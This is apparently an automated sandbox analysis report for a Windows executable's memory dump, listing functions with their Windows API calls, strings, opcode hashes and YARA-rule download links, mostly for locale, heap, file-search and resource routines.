Uniqueness Score: -1.00%

Function 0129D260, Relevance: 13.9, APIs: 9, Instructions: 374memorynativeCOMMON

Download Yara Rule

APIs

Part of subcall function 0129D6C0: EnterCriticalSection.KERNEL32(0147C7FC,2F685009,00000000,?,?,?,?,?,?,0129CF20,013DD67D,000000FF), ref: 0129D6FD
Part of subcall function 0129D6C0: LoadCursorW.USER32(00000000,00007F00), ref: 0129D778
Part of subcall function 0129D6C0: LoadCursorW.USER32(00000000,00007F00), ref: 0129D81E

SysFreeString.OLEAUT32(00000000), ref: 0129D303
SysAllocString.OLEAUT32(00000000), ref: 0129D334
NtdllDefWindowProc_W.NTDLL(?,?,00000001,?), ref: 0129D434
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0129D518
GlobalLock.KERNEL32 ref: 0129D526
GlobalUnlock.KERNEL32(?), ref: 0129D54A
SysFreeString.OLEAUT32(00000000), ref: 0129D5E6
NtdllDefWindowProc_W.NTDLL(?,?,?,00000000), ref: 0129D62D
SysFreeString.OLEAUT32(00000000), ref: 0129D655

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: String$FreeGlobal$AllocCursorLoadNtdllProc_Window$CriticalEnterLockSectionUnlock
String ID:
API String ID: 1731571310-0
Opcode ID: e21f69b135aad79bc4fed240abf9132381ade61100bffd78c0cb7140689027e1
Instruction ID: fa2479d16056e5e8cc02a26e3464d88226c7b7a7da33f49476a426a46aa317aa
Opcode Fuzzy Hash: e21f69b135aad79bc4fed240abf9132381ade61100bffd78c0cb7140689027e1
Instruction Fuzzy Hash: D5D1CE7090024AEFEF11CFECD948BAEBFB8EF45314F144158EA15A7290D7799A00DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013D20EC, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 013CC266: GetLastError.KERNEL32(?,?,?,013C13D2,?,?,00000000,?,013C0915,?,?,?), ref: 013CC26B
Part of subcall function 013CC266: SetLastError.KERNEL32(00000000,00000002,000000FF,?,013C0915,?,?,?), ref: 013CC309

GetACP.KERNEL32(?,?,?,?,?,?,013C8008,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 013D21AD
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,013C8008,?,?,?,00000055,?,-00000050,?,?), ref: 013D21D8
_wcschr.LIBVCRUNTIME ref: 013D226C
_wcschr.LIBVCRUNTIME ref: 013D227A
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 013D233B

Strings

utf8, xrefs: 013D22AA

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: 3cee376b9e641fe95261e798f0cd07d0e1fe4e40ddeb7bc16928766d7ff3143b
Instruction ID: 28d4721f4f059e281004c1e8fbf8dfea9103d0a1c5ad156e05296aa604a6de21
Opcode Fuzzy Hash: 3cee376b9e641fe95261e798f0cd07d0e1fe4e40ddeb7bc16928766d7ff3143b
Instruction Fuzzy Hash: FF711B73A00306AAEB25AB7DEC45BA777A9EF58718F104469FA05DB180FB70D940C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 013D7354, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1455COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 013D7510

Strings

1#IND, xrefs: 013D87ED
1#SNAN, xrefs: 013D87F7
1#QNAN, xrefs: 013D8801
1#INF, xrefs: 013D880B

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 47c29186286632c06aec80c8b8013c8bf3c024aa1504333f0114a13e9ff818cc
Instruction ID: c2b27c73527f597d9f5f4a2c39049e3b7285cc7a8c90f923cbb9e743ccebfa1c
Opcode Fuzzy Hash: 47c29186286632c06aec80c8b8013c8bf3c024aa1504333f0114a13e9ff818cc
Instruction Fuzzy Hash: 8FD23B72E082298FDB65CF28ED407EAB7B9EB44309F1445EAD50DE7240E774AE858F41

Uniqueness

Uniqueness Score: -1.00%

Function 013640F0, Relevance: 9.2, APIs: 6, Instructions: 196fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00000000,-00000010,?,2F685009,?,00000000,00000000), ref: 013641C1
FindNextFileW.KERNEL32(?,00000000), ref: 013641DC

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFind$FirstNext
String ID:
API String ID: 1690352074-0
Opcode ID: fe8def88481d33c019a6a9e4c276ba14a159542b19e6b8aa5b0fe2b6cf1bdea9
Instruction ID: e294f966acab87f4ff9bcef9af933b45f323c33b4e12b173ca1ab4fb23aa52b4
Opcode Fuzzy Hash: fe8def88481d33c019a6a9e4c276ba14a159542b19e6b8aa5b0fe2b6cf1bdea9
Instruction Fuzzy Hash: 2D716C71D01289DFDF11DFA8C948AEEBBB8FF19318F148169E815AB294D7349A04CB50

Uniqueness

Uniqueness Score: -1.00%

Function 013B95CD, Relevance: 9.0, APIs: 6, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000C,013B94E9,00000000,?,013B9681,00000000,?,?,0129EC44,?), ref: 013B95CF
GetProcessHeap.KERNEL32(00000008,00000008,00000000,00000000,?,?,0129EC44,?), ref: 013B95F6
HeapAlloc.KERNEL32(00000000,?,?,0129EC44,?), ref: 013B95FD
InitializeSListHead.KERNEL32(00000000,?,?,0129EC44,?), ref: 013B960A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,0129EC44,?), ref: 013B961F
HeapFree.KERNEL32(00000000,?,?,0129EC44,?), ref: 013B9626

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Process$AllocFeatureFreeHeadInitializeListPresentProcessor
String ID:
API String ID: 1475849761-0
Opcode ID: 7b926a03b46c1d85e7285189b8462540e65fa8950affe99676301ce1252d7612
Instruction ID: 4e3712339350883c0d65a8258861df8577906cd8800ff7130cf5994be2133e8d
Opcode Fuzzy Hash: 7b926a03b46c1d85e7285189b8462540e65fa8950affe99676301ce1252d7612
Instruction Fuzzy Hash: 09F044B56402019FD7319F7DA848B967BA9FBC9729F010429F741DB254EB34C401CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013D2878, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,013D2B96,00000002,00000000,?,?,?,013D2B96,?,00000000), ref: 013D2911
GetLocaleInfoW.KERNEL32(?,20001004,013D2B96,00000002,00000000,?,?,?,013D2B96,?,00000000), ref: 013D293A
GetACP.KERNEL32(?,?,013D2B96,?,00000000), ref: 013D294F

Strings

ACP, xrefs: 013D2896
OCP, xrefs: 013D28CC

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 4ce2c8bbd30301bd9e3cb2bf625115f2909975f975c693652a090634b93dc919
Instruction ID: 6daea832e12b0fcb330cf1e5ebea69c34ba0a88263b9a9630560ec9b9169fbbb
Opcode Fuzzy Hash: 4ce2c8bbd30301bd9e3cb2bf625115f2909975f975c693652a090634b93dc919
Instruction Fuzzy Hash: 7221DA33B00105AAEB368F6DF905B977BAAEF44BACB568024FA09D7115E732DA41C350

Uniqueness

Uniqueness Score: -1.00%

Function 0129CCB0, Relevance: 7.8, APIs: 5, Instructions: 293nativememoryCOMMON

Download Yara Rule

APIs

NtdllDefWindowProc_W.NTDLL(00000004,?,00000001,?), ref: 0129CDC4
GlobalAlloc.KERNEL32(00000042,00000000), ref: 0129CEA8
GlobalLock.KERNEL32 ref: 0129CEB6
GlobalUnlock.KERNEL32(?), ref: 0129CEDA
NtdllDefWindowProc_W.NTDLL(00000004,?,00000000,00000000), ref: 0129CF8D

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$NtdllProc_Window$AllocLockUnlock
String ID:
API String ID: 3143318529-0
Opcode ID: 30d2fc1b5bbaa4b03fc7e2d29da92e5104e485bd856af28b3bfef87dee7179dc
Instruction ID: 7db7c04078c1c77b99eebef0017aa32448fa75358f8606a9b70205ecfa3ca22c
Opcode Fuzzy Hash: 30d2fc1b5bbaa4b03fc7e2d29da92e5104e485bd856af28b3bfef87dee7179dc
Instruction Fuzzy Hash: 78A1A2B1910206DBEF21DF6CCC08BAFBBB9EF45710F144619FA16A7290DB349910CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013D2A4D, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 013CC266: GetLastError.KERNEL32(?,?,?,013C13D2,?,?,00000000,?,013C0915,?,?,?), ref: 013CC26B
Part of subcall function 013CC266: SetLastError.KERNEL32(00000000,00000002,000000FF,?,013C0915,?,?,?), ref: 013CC309

Part of subcall function 013CC266: _free.LIBCMT ref: 013CC2C8
Part of subcall function 013CC266: _free.LIBCMT ref: 013CC2FE

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 013D2B59
IsValidCodePage.KERNEL32(00000000), ref: 013D2BA2
IsValidLocale.KERNEL32(?,00000001), ref: 013D2BB1
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 013D2BF9
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 013D2C18

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: 5888a3739dea8194ad9ba872a11af3a144cc4b9499f380cec47eb416c3d479c9
Instruction ID: 0ebfe483ed6b142c1d80d7caec2ab986fcf4b35d2b8d4b355d07e6af9d365575
Opcode Fuzzy Hash: 5888a3739dea8194ad9ba872a11af3a144cc4b9499f380cec47eb416c3d479c9
Instruction Fuzzy Hash: AC514373A0020AAEEF10DFA9EC41EBF77B8FF54705F144569E915EB194DBB099008B61

Uniqueness

Uniqueness Score: -1.00%

Function 013487A0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106registryCOMMON

Download Yara Rule

APIs

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

GetLocaleInfoW.KERNEL32(?,00000002,01420988,00000000), ref: 01348811
GetLocaleInfoW.KERNEL32(?,00000002,013482D5,-00000001,00000078,-00000001), ref: 0134884D
RegCloseKey.ADVAPI32(?,?,80004005,2F685009,?,?,?), ref: 013488BB

Strings

%d-%s, xrefs: 01348857

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoInit_thread_footerLocale$CloseHeapProcess
String ID: %d-%s
API String ID: 47228292-1781338863
Opcode ID: d65317570bc5daf31bcf15776dca2ef6ae9b03273e72a5a6dabdd78dfb55d12e
Instruction ID: 3dd51e4c121d5c2ad68ce9320de590981f4dd9ed415d881b1757a3f739f176e2
Opcode Fuzzy Hash: d65317570bc5daf31bcf15776dca2ef6ae9b03273e72a5a6dabdd78dfb55d12e
Instruction Fuzzy Hash: D131AE71A00209AFEB14DF99DC48BAEBBF8FF45718F14856DF515A7290DB719900CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013B959D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 19memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,Ph/,?,013B9703,00000000,?,?,012A0183,?,2F685009), ref: 013B95B5
HeapFree.KERNEL32(00000000,?,013B9703,00000000,?,?,012A0183,?,2F685009), ref: 013B95BC
InterlockedPushEntrySList.KERNEL32(00000000,Ph/,?,013B9703,00000000,?,?,012A0183,?,2F685009), ref: 013B95C5

Strings

Ph/, xrefs: 013B95A0, 013B95AD

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$EntryFreeInterlockedListProcessPush
String ID: Ph/
API String ID: 1982578398-906322640
Opcode ID: d632a3872e9b68736cd86ae150c5b710d870cbc5cb42c422b42b68166770b37b
Instruction ID: 63a56cfbf991f66c5d31a3bc48bf9794347b1befc22f7eb4f937c3c86f8315f8
Opcode Fuzzy Hash: d632a3872e9b68736cd86ae150c5b710d870cbc5cb42c422b42b68166770b37b
Instruction Fuzzy Hash: F6D05EB1190204EBCA206FE8F8C8FEA3B6CEB8961AF000405F30A8A455DB31E0408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 01328B70, Relevance: 6.3, APIs: 4, Instructions: 321fileCOMMON

Download Yara Rule

APIs

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

FindFirstFileW.KERNEL32(?,00000000), ref: 01328CC8
FindFirstFileW.KERNEL32(?,00000000,0000002A,?,00000000), ref: 01328D65
FindClose.KERNEL32(00000000,?,00000000), ref: 01328D8B
FindClose.KERNEL32(00000000,?,00000000), ref: 01328DD5

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirstInit_thread_footer$HeapProcess
String ID:
API String ID: 3625725927-0
Opcode ID: 0a185fe945acbfbe606c9ca19fddbfe00bc97dde230cfbd43faff7221637606c
Instruction ID: 0f03aca479dff10dd8eee07b9367728e65124c9e411536983513053d014f83e5
Opcode Fuzzy Hash: 0a185fe945acbfbe606c9ca19fddbfe00bc97dde230cfbd43faff7221637606c
Instruction Fuzzy Hash: 6BA1EF71A002599FDB14EF6CCC44BAEBBF4FF54328F14866EE915D7280E77599048B90

Uniqueness

Uniqueness Score: -1.00%

Function 012AC080, Relevance: 5.3, Strings: 4, Instructions: 346COMMON

Download Yara Rule

Strings

AI_CONTROL_VISUAL_STYLE, xrefs: 012AC0E8
AI_CONTROL_VISUAL_STYLE_EX, xrefs: 012AC3A8
AI_NO_BORDER_NORMAL, xrefs: 012AC150
AI_NO_BORDER_HOVER, xrefs: 012AC1CB

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: AI_CONTROL_VISUAL_STYLE$AI_CONTROL_VISUAL_STYLE_EX$AI_NO_BORDER_HOVER$AI_NO_BORDER_NORMAL
API String ID: 0-932585912
Opcode ID: 5babb210405062286b689dbaf322c4b7bc1df9b8888d5735d1793dfa2b643232
Instruction ID: 51a16036751eb4106cc280c1afc38db89b2d084951dbb4b63616a4e1ace18116
Opcode Fuzzy Hash: 5babb210405062286b689dbaf322c4b7bc1df9b8888d5735d1793dfa2b643232
Instruction Fuzzy Hash: 53D19EB0D10218DFEF08CFA9C844BADBBF1FF95304F508199D455AB295D778AA09CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013C03A3, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 013C049B
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 013C04A5
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 013C04B2

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: d555b3ad80352fc9a7da39b48335d71d4856530961e77760a460a658231a3251
Instruction ID: 9c4c54e20404919f06380a61e309955a887a0245042e67ab1c89fe746af7eaad
Opcode Fuzzy Hash: d555b3ad80352fc9a7da39b48335d71d4856530961e77760a460a658231a3251
Instruction Fuzzy Hash: A731E4759012299BCB21DF68D8887CDBBB8BF58714F5041EAE50CA72A0EB749F818F44

Uniqueness

Uniqueness Score: -1.00%

Function 01297B80, Relevance: 4.6, APIs: 3, Instructions: 64COMMON

Download Yara Rule

APIs

LoadResource.KERNEL32(00000000,00000000,2F685009,00000001,00000000,?,00000000,013DBAE0,000000FF,?,01297B2C,?,?,?,-00000010,013DBF00), ref: 01297BAB
LockResource.KERNEL32(00000000,?,01297B2C,?,?,?,-00000010,013DBF00,000000FF,?,01297CD0,?,00000001,?,012A4AC0,-00000010), ref: 01297BB6
SizeofResource.KERNEL32(00000000,00000000,?,01297B2C,?,?,?,-00000010,013DBF00,000000FF,?,01297CD0,?,00000001,?,012A4AC0), ref: 01297BC4

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Resource$LoadLockSizeof
String ID:
API String ID: 2853612939-0
Opcode ID: 9b34598a82b996e9fef4c73549ad7441e39a98aa8f5a2da2d30703b56dcaf0a9
Instruction ID: 3a42c8307cf8edbea0f0a47147ba375cae9e2bc6c5528790350ea79fb9c36a2a
Opcode Fuzzy Hash: 9b34598a82b996e9fef4c73549ad7441e39a98aa8f5a2da2d30703b56dcaf0a9
Instruction Fuzzy Hash: 4311EB72A146559BDF368F5DE844B66F7ECEB85621F01452EED16C3240F63568008BD0

Uniqueness

Uniqueness Score: -1.00%

Function 0135B9F0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?,2F685009), ref: 0135BA4E

Part of subcall function 01298770: GetProcessHeap.KERNEL32 ref: 012987C5
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 012987F7
Part of subcall function 01298770: __Init_thread_footer.LIBCMT ref: 01298882

Strings

%04d-%02d-%02d %02d-%02d-%02d, xrefs: 0135BA90

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Init_thread_footer$HeapLocalProcessTime
String ID: %04d-%02d-%02d %02d-%02d-%02d
API String ID: 219929307-3768011868
Opcode ID: d8117f5a9cbe57fe87744d03381179522ff2e41e260761b10e247ad52b4fe208
Instruction ID: c5849931ca1f14946bc873841604644e000db58bd74c3923bc089e6a3527dba3
Opcode Fuzzy Hash: d8117f5a9cbe57fe87744d03381179522ff2e41e260761b10e247ad52b4fe208
Instruction Fuzzy Hash: 45217FB1D10209AFDB14DF99D941BBEB7F8EB0C710F14421EF915A7280E7745940CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 013529C0, Relevance: 3.1, APIs: 2, Instructions: 71fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,2F685009,?,00000000,00000000,00000000,0140038D,000000FF), ref: 01352A28
FindClose.KERNEL32(00000000,?,2F685009,?,00000000,00000000,00000000,0140038D,000000FF), ref: 01352A72

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
Opcode ID: 9d3460915681d96e8f24e16ae0b818e528388de9c723498f51620c8e860a8ed3
Instruction ID: 083e4d4ead16ca9e762f37f1c13fee93d617b849f0d20def53ca8f52d2ab7e95
Opcode Fuzzy Hash: 9d3460915681d96e8f24e16ae0b818e528388de9c723498f51620c8e860a8ed3
Instruction Fuzzy Hash: 3D219F71900549DFDB20DF68CD48BAEBBB4EF45724F10426AE9259B2D4EB345A088B90

Uniqueness

Uniqueness Score: -1.00%

Function 012AA2E0, Relevance: 1.6, APIs: 1, Instructions: 87COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?,2F685009,?,?,?,?,013DF944,000000FF), ref: 012AA373

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalDeleteSection
String ID:
API String ID: 166494926-0
Opcode ID: 83bfdedf64895983ce636cfd39522dd174fb9196a7e5b9f7836c549090f50570
Instruction ID: a07c6843fd004450ab3802d571d36ef4d3737a4a4cca1804f3d1756dd57b72dd
Opcode Fuzzy Hash: 83bfdedf64895983ce636cfd39522dd174fb9196a7e5b9f7836c549090f50570
Instruction Fuzzy Hash: AD31CEB0A04646FFDB21CF68C844B9AFFE8FF05324F104259EA24A3691E7B1E514CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013D23D9, Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 013CC266: GetLastError.KERNEL32(?,?,?,013C13D2,?,?,00000000,?,013C0915,?,?,?), ref: 013CC26B
Part of subcall function 013CC266: SetLastError.KERNEL32(00000000,00000002,000000FF,?,013C0915,?,?,?), ref: 013CC309

EnumSystemLocalesW.KERNEL32(013D24FF,00000001,00000000,?,-00000050,?,013D2B2D,00000000,?,?,?,00000055,?), ref: 013D244B

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 4cfa215fe1ec7147985af5d8042539390349ebbac77926649865d6633ad23c7a
Instruction ID: 9a908a44cb7627ec534c10065408f5ee2f1a3f7a0f9db7532f07120d8a398d7d
Opcode Fuzzy Hash: 4cfa215fe1ec7147985af5d8042539390349ebbac77926649865d6633ad23c7a
Instruction Fuzzy Hash: BC11C2372007019FDB18AF79D8915BBBBA2FF8475CB15442CE98697A40E771A942DB40

Uniqueness

Uniqueness Score: -1.00%

Function 013D2474, Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

Part of subcall function 013CC266: GetLastError.KERNEL32(?,?,?,013C13D2,?,?,00000000,?,013C0915,?,?,?), ref: 013CC26B
Part of subcall function 013CC266: SetLastError.KERNEL32(00000000,00000002,000000FF,?,013C0915,?,?,?), ref: 013CC309

EnumSystemLocalesW.KERNEL32(013D2752,00000001,?,?,-00000050,?,013D2AF1,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 013D24BE

Memory Dump Source

Source File: 00000001.00000002.723104258.0000000001291000.00000020.00020000.sdmp, Offset: 01290000, based on PE: true

Associated: 00000001.00000002.723097856.0000000001290000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723425577.0000000001415000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.723490719.0000000001476000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.723507064.000000000147D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 7f2b0032f62517412deb1f7f4510f99480d9cde118a5054505481d6d159673e3
Instruction ID: 5ec005571ef8f4e97d9efe7a0b3533e4871b35f01f4f7eb4b9b652cdc221df4c
Opcode Fuzzy Hash: 7f2b0032f62517412deb1f7f4510f99480d9cde118a5054505481d6d159673e3
Instruction Fuzzy Hash: 2CF0C2373003055FDB255F79E880ABBBBA1EB8066CF05842CFD495BA40D67198428B50

Uniqueness

